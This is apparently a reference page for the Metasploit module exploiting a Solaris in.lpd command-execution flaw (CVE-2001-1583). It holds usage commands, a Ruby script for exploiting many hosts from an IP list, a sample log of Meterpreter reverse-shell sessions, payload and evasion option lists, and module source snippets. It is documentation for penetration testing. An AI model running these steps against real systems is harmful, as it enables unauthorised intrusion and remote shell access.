Solaris LPD Command Execution - Metasploit


This page contains detailed information about how to use the exploit/solaris/lpd/sendmail_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Solaris LPD Command Execution
Module: exploit/solaris/lpd/sendmail_exec
Source code: modules/exploits/solaris/lpd/sendmail_exec.rb
Disclosure date: 2001-08-31
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Solaris, Unix
Target service / protocol: -
Target network port(s): 515
List of CVEs: CVE-2001-1583

This module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Sun Solaris up to and including 8.0. This module uses a technique discovered by Dino Dai Zovi to exploit the flaw without needing to know the resolved name of the attacking system.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using sendmail_exec against a single host

Normally, you can use exploit/solaris/lpd/sendmail_exec this way:

msf > use exploit/solaris/lpd/sendmail_exec
msf exploit(sendmail_exec) > show targets
    ... a list of targets ...
msf exploit(sendmail_exec) > set TARGET target-id
msf exploit(sendmail_exec) > show options
    ... show and set options ...
msf exploit(sendmail_exec) > exploit

Using sendmail_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your sendmail_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/solaris/lpd/sendmail_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the solaris/lpd/sendmail_exec exploit module looks in the msfconsole:

msf6 > use exploit/solaris/lpd/sendmail_exec

msf6 exploit(solaris/lpd/sendmail_exec) > show info

       Name: Solaris LPD Command Execution
     Module: exploit/solaris/lpd/sendmail_exec
   Platform: Solaris, Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2001-08-31

Provided by:
  hdm <[email protected]>
  ddz <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic Target

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   515              yes       The target port (TCP)

Payload information:
  Space: 8192

Description:
  This module exploits an arbitrary command execution flaw in the 
  in.lpd service shipped with all versions of Sun Solaris up to and 
  including 8.0. This module uses a technique discovered by Dino Dai 
  Zovi to exploit the flaw without needing to know the resolved name 
  of the attacking system.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2001-1583
  OSVDB (15131)
  http://www.securityfocus.com/bid/3274

Module Options


This is a complete list of options available in the solaris/lpd/sendmail_exec exploit:

msf6 exploit(solaris/lpd/sendmail_exec) > show options

Module options (exploit/solaris/lpd/sendmail_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   515              yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Advanced Options


Here is a complete list of advanced options supported by the solaris/lpd/sendmail_exec exploit:

msf6 exploit(solaris/lpd/sendmail_exec) > show advanced

Module advanced options (exploit/solaris/lpd/sendmail_exec):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the solaris/lpd/sendmail_exec module can exploit:

msf6 exploit(solaris/lpd/sendmail_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Target

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the solaris/lpd/sendmail_exec exploit:

msf6 exploit(solaris/lpd/sendmail_exec) > show payloads

Compatible Payloads
===================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   1  payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   3  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   4  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   5  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   6  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   7  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

Evasion Options


Here is the full list of possible evasion options supported by the solaris/lpd/sendmail_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(solaris/lpd/sendmail_exec) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

The target did not accept our job request command


Here is a relevant code snippet related to the "The target did not accept our job request command" error message:

95:	
96:	    # Request a cascaded job
97:	    sock1.put("\x02metasploit:framework\n")
98:	    res = sock1.get_once
99:	    if (not res)
100:	      print_status("The target did not accept our job request command")
101:	      return
102:	    end
103:	
104:	    print_status("Configuring the spool directory...")
105:	    if !(

The target did not accept our second job request command


Here is a relevant code snippet related to the "The target did not accept our second job request command" error message:

116:	
117:	    # Request another cascaded job
118:	    sock2.put("\x02localhost:metasploit\n")
119:	    res = sock2.get_once
120:	    if (not res)
121:	      print_status("The target did not accept our second job request command")
122:	      return
123:	    end
124:	
125:	    print_status("Attempting to trigger the vulnerable call to the mail program...")
126:	    if !(

The target did not accept our control file command (<NAME>)


Here is a relevant code snippet related to the "The target did not accept our control file command (<NAME>)" error message:

144:	  def send_file(s, type, name, data='')
145:	
146:	    s.put(type.chr + data.length.to_s + " " + name + "\n")
147:	    res = s.get_once(1)
148:	    if !(res and res[0,1] == "\x00")
149:	      print_status("The target did not accept our control file command (#{name})")
150:	      return
151:	    end
152:	
153:	    s.put(data)
154:	    s.put("\x00")

The target did not accept our control file data (<NAME>)


Here is a relevant code snippet related to the "The target did not accept our control file data (<NAME>)" error message:

152:	
153:	    s.put(data)
154:	    s.put("\x00")
155:	    res = s.get_once(1)
156:	    if !(res and res[0,1] == "\x00")
157:	      print_status("The target did not accept our control file data (#{name})")
158:	      return
159:	    end
160:	
161:	    print_status(sprintf("     Uploaded %.4d bytes >> #{name}", data.length))
162:	    return true

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • hdm
  • ddz

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.